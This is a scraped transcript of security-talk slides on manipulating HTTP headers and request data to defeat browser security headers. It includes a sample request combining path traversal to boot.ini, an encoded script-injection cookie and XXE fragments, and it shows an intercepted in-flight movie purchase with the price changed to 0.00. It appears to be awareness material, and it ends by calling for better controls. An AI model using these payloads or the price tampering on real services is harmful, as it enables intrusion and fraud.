Presentation is loading. Please wait.

Presentation is loading. Please wait.

“If you can manipulate the data, game

Published byMacey Rodgerson Modified over 9 years ago

Similar presentations

Presentation on theme: "“If you can manipulate the data, game"— Presentation transcript:

1

2

3 “If you can manipulate the data, game over.” @httphacker

4 Headers…so what?

5 Why are headers important? It’s the least protected area...

6 POST /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini&url=httphacker.com HTTP/1.0 Referer: domain.com/external.xml Accept: */* User-Agent: Mozilla/5.0 Gecko/20110614 Firefox/3.6.18 Host: domain.com Connection: Keep-Alive Cookie: oAuth[access_token]=%31%33%33%37%22%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%68 %74%74%70%68%61%63%6b%65%72%29%3c%2f%73%43%72%49%70%54%3e;PHPSESSID=k04mk749i6cur91k; ! ]> null</ FROM> SEND 612117752013</ ID> null UserManagerService&xxe;</ DESTINATION> logout null </ MESSAGE> ! username:http&password=hacker The Hacker Opportunity

7 Common Misconceptions

8 Header Controls are Solid!

9 Header Controls fix app vulns!

10 Let’s review some controls…

11 Content-Security-Policy: frame-src ‘none’ Cross-Frame-Scripting: deny Maybe Java Framebusting? Prevent Clickjacking?

12 You’re good, right?

13 =)

14 CSP Content-Security-Policy - Chrome 25 (Firefox nightlies) X-Content-Security-Policy - Firefox 4+ X-WebKit-CSP - WebKit browsers (Chrome/Safari) CFS Browser support: Opera 10.5+, Chrome 4.1+, IE 8+, Firefox 3.6.9+, Safari 4+ Try a different browser!

15 Content-Security-Policy: frame-src ‘httphacker.com’ Cross-Frame-Scripting: allow Change your User Agent! Manipulate the Control

16 Content-Security-Policy: script-src ‘none’ X-XSS-Protection: 1; mode=block Prevent XSS?

17 CSP Content-Security-Policy - Chrome 25 (Firefox nightlies) X-Content-Security-Policy - Firefox 4+ X-WebKit-CSP - WebKit browsers (Chrome/Safari) Again, try a different browser!

18 X-XSS-Protection: 0 Manipulate the Control

19 Other cool tricks… Change the Source

20 Get it already?

21 “If you can manipulate the data, game over.” @httphacker

22 Let’s have some fun…

23 Pay for Vin?

24 … uppVideoInput=%257B%2522requesterType%2522%253A%2522video1.0%2522%252C%2522macAddress%2522%253A%25223C%25 3AA9%253AF4%253A3C%253A21%253AA4%2522%252C%2522catalogId%2522%253A%2522e26uu1.59%2522%252C%2522deviceT ype%2522%253A%2522laptop%2522%252C%2522language%2522%253A%2522en_US%2522%252C%2522currency%2522%253A%2 522USD%2522%252C%2522userType%2522%253A%2522%2522%252C%2522flightInfo%2522%253A%257B%2522abpVersionNo%2 522%253A%25223.1.0%2522%252C%2522aircraftTailNumber%2522%253A%2522N372NW%2522%252C%2522airlineCode%2522%2 53A%2522DAL%2522%252C%2522airlineCodeIata%2522%253A%2522DL%2522%252C%2522airlineName%2522%253A%2522%252 2%252C%2522departureAirportCode%2522%253A%2522KLAS%2522%252C%2522departureCity%2522%253A%2522%2522%252C% 2522destinationAirportCode%2522%253A%2522KDTW%2522%252C%2522destinationCity%2522%253A%2522%2522%252C%2522fli ghtNumber%2522%253A%2522DAL2654%2522%252C%2522flightNumberAlpha%2522%253A%2522DAL%2522%252C%2522flightSta tus%2522%253A%257B%257D%252C%2522noOfActiveSubscribers%2522%253A%25220%2522%252C%2522videoServiceAvailability %2522%253Atrue%257D%252C%2522productlist%2522%253A%257B%2522name%2522%253A%2522Riddick%2522%252C%2522pr esentationPriority%2522%253A40%252C%2522priceExTax%2522%253A%2522 6.00 %2522%252C%2522productCategory%2522%2 53A%2522WIRELESS1%2522%252C%2522productCode%2522%253A%2522DLCVFF0131%2522%252C%2522shortDescription%252 2%253A%2522Riddick%2522%257D%257D&price= 6.00 Original POST Request

25 … uppVideoInput=%257B%2522requesterType%2522%253A%2522video1.0%2522%252C%2522macAddress%2522%253A%25223C%25 3AA9%253AF4%253A3C%253A21%253AA4%2522%252C%2522catalogId%2522%253A%2522e26uu1.59%2522%252C%2522deviceT ype%2522%253A%2522laptop%2522%252C%2522language%2522%253A%2522en_US%2522%252C%2522currency%2522%253A%2 522USD%2522%252C%2522userType%2522%253A%2522%2522%252C%2522flightInfo%2522%253A%257B%2522abpVersionNo%2 522%253A%25223.1.0%2522%252C%2522aircraftTailNumber%2522%253A%2522N372NW%2522%252C%2522airlineCode%2522%2 53A%2522DAL%2522%252C%2522airlineCodeIata%2522%253A%2522DL%2522%252C%2522airlineName%2522%253A%2522%252 2%252C%2522departureAirportCode%2522%253A%2522KLAS%2522%252C%2522departureCity%2522%253A%2522%2522%252C% 2522destinationAirportCode%2522%253A%2522KDTW%2522%252C%2522destinationCity%2522%253A%2522%2522%252C%2522fli ghtNumber%2522%253A%2522DAL2654%2522%252C%2522flightNumberAlpha%2522%253A%2522DAL%2522%252C%2522flightSta tus%2522%253A%257B%257D%252C%2522noOfActiveSubscribers%2522%253A%25220%2522%252C%2522videoServiceAvailability %2522%253Atrue%257D%252C%2522productlist%2522%253A%257B%2522name%2522%253A%2522Riddick%2522%252C%2522pr esentationPriority%2522%253A40%252C%2522priceExTax%2522%253A%2522 0.00 %2522%252C%2522productCategory%2522%2 53A%2522WIRELESS1%2522%252C%2522productCode%2522%253A%2522DLCVFF0131%2522%252C%2522shortDescription%252 2%253A%2522Riddick%2522%257D%257D&price= 0.00 Intercepted POST Request

26 Free Movies!

27 We need better control detection and protection!

28 Thank you.

29

Download ppt "“If you can manipulate the data, game"

Similar presentations

The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.

The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.
I'll see your cross site scripting and raise you a Content Security Policy Lou Leone :: Rochester OWASP.

I'll see your cross site scripting and raise you a Content Security Policy Lou Leone :: Rochester OWASP.
Internet and Me Ok the first thing I can say about internet is, it’s very helpful important. I can’t imagine my day without it. I use Inet every day every.

Internet and Me Ok the first thing I can say about internet is, it’s very helpful important. I can’t imagine my day without it. I use Inet every day every.
HTTPS Hypertext Transfer Protocol Secure Marcela López Hurtado.

HTTPS Hypertext Transfer Protocol Secure Marcela López Hurtado.
17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.

17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.
Cross Site Request Forgery CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Cross Site Request Forgery CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
Skills: none Concepts: protocol, hypertext transfer protocol, standard This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike.

Skills: none Concepts: protocol, hypertext transfer protocol, standard This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike.
Popular Web client and server programs This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 License. Skills: none IT.

Popular Web client and server programs This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 License. Skills: none IT.
1 HTTP – HyperText Transfer Protocol Part 1. 2 Common Protocols In order for two remote machines to “ understand ” each other they should –‘‘ speak the.

1 HTTP – HyperText Transfer Protocol Part 1. 2 Common Protocols In order for two remote machines to “ understand ” each other they should –‘‘ speak the.
Servlets and JSP Nelson Padua-Perez William Pugh Department of Computer Science University of Maryland, College Park.

Servlets and JSP Nelson Padua-Perez William Pugh Department of Computer Science University of Maryland, College Park.
CS 142 Lecture Notes: HTTPSlide 1 HTTP Request GET /index.html HTTP/1.1 Host: User-Agent: Mozilla/5.0 Accept: text/html, */* Accept-Language:

CS 142 Lecture Notes: HTTPSlide 1 HTTP Request GET /index.html HTTP/1.1 Host: User-Agent: Mozilla/5.0 Accept: text/html, */* Accept-Language:
Web Application Security 101 Steve Carter (special thanks to SPI Dynamics)

Web Application Security 101 Steve Carter (special thanks to SPI Dynamics)
Client, Server, HTTP, IP Address, Domain Name. Client-Server Model Client Bob Yahoo Server yahoo.com/finance.html A text file named finance.html.

Client, Server, HTTP, IP Address, Domain Name. Client-Server Model Client Bob Yahoo Server yahoo.com/finance.html A text file named finance.html.
Rensselaer Polytechnic Institute CSC-432 – Operating Systems David Goldschmidt, Ph.D.

Rensselaer Polytechnic Institute CSC-432 – Operating Systems David Goldschmidt, Ph.D.
Boris Tshibangu. What is a proxy server? A proxy server is a server (a computer system or an application) that acts as an intermediary for requests from.

Boris Tshibangu. What is a proxy server? A proxy server is a server (a computer system or an application) that acts as an intermediary for requests from.
By Swapnesh Chaubal Rohit Bhat. BEAST : Browser Exploit Against SSL/TLS Julianno Rizzo and Thai Duong demonstrated this attack.

By Swapnesh Chaubal Rohit Bhat. BEAST : Browser Exploit Against SSL/TLS Julianno Rizzo and Thai Duong demonstrated this attack.
BROWSERS & BROWSING What, Which & Why. WHAT IS A BROWSER? Once you have an Internet connection, some programs access the internet automatically to operate.

BROWSERS & BROWSING What, Which & Why. WHAT IS A BROWSER? Once you have an Internet connection, some programs access the internet automatically to operate.
How to Detect a Client’s Browser Senior Seminar CS498.

How to Detect a Client’s Browser Senior Seminar CS498.
Computer Concepts 2014 Chapter 7 The Web and E-mail.

Computer Concepts 2014 Chapter 7 The Web and .

Similar presentations

Ads by Google